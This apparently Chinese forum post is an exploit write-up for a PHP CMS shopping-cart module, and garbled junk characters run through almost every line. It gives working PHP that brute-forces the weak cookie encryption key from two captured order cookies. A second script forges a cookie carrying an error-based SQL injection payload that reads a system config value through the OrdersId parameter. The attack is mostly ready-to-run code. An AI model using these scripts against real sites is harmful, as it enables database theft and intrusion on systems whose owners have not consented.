www.xxx.com/plus/search.php?keyword=
- {3 N6 ^' O( d在 include/shopcar.class.php中7 ~/ I$ |+ V4 i' f9 W
先看一下这个shopcar类是如何生成cookie的
8 _& I! A: i9 ^% ~# ~/ h! e239 function saveCookie($key,$value)
) c2 Q0 e+ @% \8 i240 {% w: g7 b+ Z; G- ^
241 if(is_array($value))% ?! J) u; M3 Y
242 {) A b: M3 n+ \
243 $value = $this->enCrypt($this->enCode($value));
$ F/ L/ r7 o+ F3 `244 }
N2 M8 Z, K7 S4 w. K" Q6 ~245 else8 r; G3 h; N2 M ~/ U% R6 N
246 { y( N1 }* a4 d! ]0 [! t, Q
247 $value = $this->enCrypt($value);
+ c7 S2 Z; ]" r- E. o0 i/ Z248 }
/ m+ s; R1 X5 F5 V! `249 setcookie($key,$value,time()+36000,’/');
Q8 O5 K% D9 o5 T+ n7 f, |250 }
) J& E u! d2 d0 Q# e, V Q2 b/ x/ y简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数% v5 \( n( g/ r* E A
186 function enCrypt($txt)
) O5 M) |, U, I/ c187 {
" c7 d. z; P- u8 A; Z7 D188 srand((double)microtime() * 1000000);$ P4 V' f; E4 T. v. |) k
189 $encrypt_key = md5(rand(0, 32000));
% b I% _* H1 {/ {. Q! }+ r9 y190 $ctr = 0;. }, E9 G( \5 X, r# z2 z
191 $tmp = ”;% h+ [, c9 C* z- \ z
192 for($i = 0; $i < strlen($txt); $i++)
2 x, @9 V( b' ?193 {, x9 i" K7 c+ S' B
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;& Z0 m. u/ K$ O' F" k9 g g
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
h; @- E5 P" G196 }
* ?9 [/ _* f/ y1 G4 Y6 z197 return base64_encode($this->setKey($tmp));
+ H5 @- _+ H; u! j W. L# q. d! i198 }
) Q9 x: X) U0 A# K7 M/ a213 function setKey($txt)) S' M/ o% ~0 R
214 {4 Z- l+ |4 f8 }* o6 b
215 global $cfg_cookie_encode;
. T3 r3 I: S; S u- f216 $encrypt_key = md5(strtolower($cfg_cookie_encode));/ ~; ^$ `3 w' y4 v
217 $ctr = 0;, g5 K2 N6 M- B* x; z! z- \
218 $tmp = ”;
# F% I9 {& ]. s8 G219 for($i = 0; $i < strlen($txt); $i++); O$ G1 C5 K) |$ s" k1 s
220 {
7 y9 x: |; z9 W: U221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;; x& z! G" o; o' X, H
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];+ v' \& H3 ?5 e$ K _. Y4 ]6 Z1 S
223 }! u$ P& j: p( q! A3 y" K5 W9 }1 B
224 return $tmp;
5 b1 I# ?" s3 x/ Q225 }& m# m- d1 s, v& D/ u
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的# z1 q. w, a% X+ a
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
; I0 ^1 f* Q" g9 t7 [具体代码如下:
* y4 _% n- v v7 S: N<?php
) n+ I8 R5 Q5 g1 o+ R a$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
! E" W4 v1 s& k6 W1 s6 T$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here* T. H+ J5 \" ^+ `$ y% {7 G
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here; f2 M% | Z% m8 `( l' @# S
function reStrCode($code,$string)
/ C R$ T- a# x. D{
9 _/ ^5 M3 [, ]0 T y' C5 p$code = base64_decode($code);
* L* r5 c/ c( s2 S) C4 N2 R$key = “”;& d" v4 C9 b4 a3 `7 B. H: D
for($i=0 ; $i<32 ; $i++)
( p+ K8 G5 V% l8 c5 u- b9 a/ s) n{
1 n$ ]" \$ ~5 J$ D; M$key .= $string[$i] ^ $code[$i];( S: b9 L1 a M! @ ^8 ~. ]9 u
}
) ~# ?( h6 f8 z( ]* u' @return $key;2 Z9 M9 o: u% C( X$ k6 o
}
9 t! z& U2 y5 Y3 F. Kfunction getKeys($cookie,$plantxt)' L1 e& S$ ]( }/ t2 K% ]/ v I. }. |$ U
{
; [4 O1 L( U. n0 F! r4 c$tmp = $cookie;& p, J. U7 K8 Q, v& M
$results = array(); b: @1 O" O" j! Z
for($j=0 ; $j < 32000; $j++)
! V9 a$ R+ w$ A* w3 G{+ {5 a0 \6 ^: D5 f* z) r
& R' u6 w S$ m2 ^3 m
$txt = $plantxt;4 q, Z8 X' H, Q2 V2 n$ z
$ctr = 0; f% G# F/ Q* u0 u# W0 O9 J! x% ~" @
$tmp = ”;
0 j% b9 q; ?9 B- _$encrypt_key = md5($j);
* f! g4 l: _$ Gfor($i =0; $i < strlen($txt); $i ++)
6 D% p& J# X* |8 Y, r! O{
! w: |7 z) X' @2 v/ _' G0 e1 R# i$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;1 G1 A3 s( |. x: e$ ]& l0 Z5 D' }
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);# c( s1 Q0 A; j6 {
}
) k: ]7 m" _4 W' Y. k' V N$string = $tmp;/ `7 k9 w5 d/ _+ T% O5 u6 z
$code = $cookie;
# h- o1 _$ M6 ? ]0 ?# b$result = reStrCode($code,$string);
' }0 h2 q2 A% @4 X- Q6 Oif(eregi(‘^[a-z0-9]+$’,$result)). h) ^0 M9 b' }
{ {! c: x' d0 o3 w
echo $result.”\n”;7 d& r [3 o" B! s. X2 G
$results[] = $result;
3 e9 k! J2 k* P* v" \# q! f. s}( h* o) q$ d! l; T7 x
}
1 h3 w7 |9 \! qreturn $results; o& h3 u5 k; s. Y$ M; N
}
4 W& Z2 q; n8 p1 z( Q$results1 = getKeys($cookie1,$plantxt);
g8 |# t1 X3 ~$results2 = getKeys($cookie2,$plantxt);. }6 Z2 v" `+ F
print “\n——————–real key————————–\n”;
9 l7 A) R! n! b) m* Q- z uforeach($results1 as $test1)& s0 \5 t2 R% u# X
{0 d* n- C1 e1 p
foreach($results2 as $test2)
+ M1 C/ ]7 x) l$ R{
% c1 O" O6 C1 M& @! Kif($test1 == $test2)( N# V* X& i6 y& P6 R$ ]& g. [
{. n5 u3 Z/ `- w7 I2 b- S# ?3 Q7 X
echo $test1.”\n”;/ L9 B7 X4 P: A
}
( l O. R' q- @# U, N/ M}- W+ `1 k" W# w( u2 L
}$ j% ^7 T- p+ k$ \/ J `4 V( j+ U
?>& Q! B5 y& _4 w) T
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,/ p$ j. P: |0 i! l M5 A
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
* ]6 W" @$ s: z0 N然后推算出md5(strtolower($cfg_cookie_encode))
+ c1 d6 @& ~- ^得到这个key之后,我们就可以构造任意购物车的cookie- z( w% H, z6 y9 q& Y& L+ a
接着看
8 A8 X2 {9 G2 T/ s) Q20 class MemberShops0 \; W6 X; P1 h' F5 I/ J
21 {" g8 N' l6 e: J% h/ l
22 var $OrdersId;
' K- _. r# l( n; F7 L23 var $productsId;
. N Y" ]7 ^, }7 }2 [( h% Y/ c24' m6 ?2 n, p8 e( O9 _4 p& u: ]
25 function __construct()
6 ^. E4 @) N& {) u9 C7 l2 Q5 i& v26 {* N& F- w" a7 k( ~! @: z) h& s4 a+ j7 V
27 $this->OrdersId = $this->getCookie(“OrdersId”);
( F& O) H b& _* }28 if(empty($this->OrdersId))
/ o3 Q: }1 A: l1 W6 x9 x% \- W2 l29 {8 E1 z# r6 i0 ^- v v4 l
30 $this->OrdersId = $this->MakeOrders();+ v! Y( |+ a- {' Y
31 }
; O/ |9 |& _* F, B32 }8 G* W. H& ] v( E8 E6 O
发现OrderId是从cookie里面获取的
; P/ ~1 B6 d) ?( C7 n5 l) W然后
6 z, g- m; x! W. P: E/plus/carbuyaction.php中的
3 J; e+ Z0 Q! C6 G4 e8 O0 O6 ?29 $cart = new MemberShops();, _5 y- n' Q, h
39 $OrdersId = $cart->OrdersId; //本次记录的订单号2 Y. A( l; r: ]0 u# G- H7 V/ [
……' w @' `7 O) O
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);/ P z D* i! ]) e+ u
接着我们就可以注入了! S, C; _% ^* S4 g
通过利用下面代码生成cookie:
a& A. B" u6 d<?php
" m. D4 U* ~3 Z; E. U) |$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;# X6 A' r! b7 w' h, h1 o! C
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
3 t: n3 D/ o$ ^9 f% {function setKey($txt): K+ s- ^. P& m1 R. J" {
{* T2 v3 K: I+ ]4 _2 V, D
global $encrypt_key; O, [. L+ M9 {) v; J
$ctr = 0;! W" ^/ Z2 Q: J3 u
$tmp = ”;5 s. X9 B6 B3 P0 @
for($i = 0; $i < strlen($txt); $i++)2 v7 C+ R ~$ s4 a: y$ L
{
6 G9 i+ n" C6 v$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;3 [. g' F3 A4 C$ Z: P, a
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
+ H' _( k' Z7 i2 x5 g}
$ a$ J1 O$ J" Q. g( Yreturn $tmp;! p) o4 b7 Z8 K' k
}
3 N3 q: w4 l6 J# h. cfunction enCrypt($txt) m* d& s) \/ b( ]* m) z
{
$ j' z. e9 }& l3 }- vsrand((double)microtime() * 1000000);" h' c; q7 V N8 ^1 ?. _
$encrypt_key = md5(rand(0, 32000));3 F7 C4 S, {2 z) m- J
$ctr = 0;
3 m) \$ c0 n3 g W7 Z M' ~$tmp = ”;/ _+ g( V8 ?6 t8 y' o8 C
for($i = 0; $i < strlen($txt); $i++)
1 w: x K s3 J0 l* B{" \: a' e" J% ~( W' @- t' A" N
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;1 I4 h4 [3 L& C2 B& i1 M7 C
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);8 Y" y3 i; Y% c
}
- q: [6 s6 c. X9 Y3 B! Y! Zreturn base64_encode(setKey($tmp));( B: h$ M/ \4 c. ~6 g2 _) Y8 V
}4 T4 }% z" A8 q! ]$ D
for($dest =0;$dest = enCrypt($txt);)% b. [% o' O1 [; }1 I5 Y8 r* R" t
{6 x0 r3 S2 t. M5 g8 E9 D$ M( B
if(!strpos($dest,’+'))
$ k9 t) e" K. }" t4 S- ]3 o$ `* s{. t5 D$ i2 K8 y. o7 F+ _6 q* e
break;5 {$ f, K) X6 k
}, ~5 @" q) I! Z0 r9 _5 P% ]
}
4 O# c1 f$ n5 L! yecho $dest.”\n”;; B7 q7 r/ x( V
?>
& ?8 C2 n) Z9 t6 v. d0 n- y. N8 Z4 e1 v
|
发表于 2013-2-13 23:58:29
收藏
支持
反对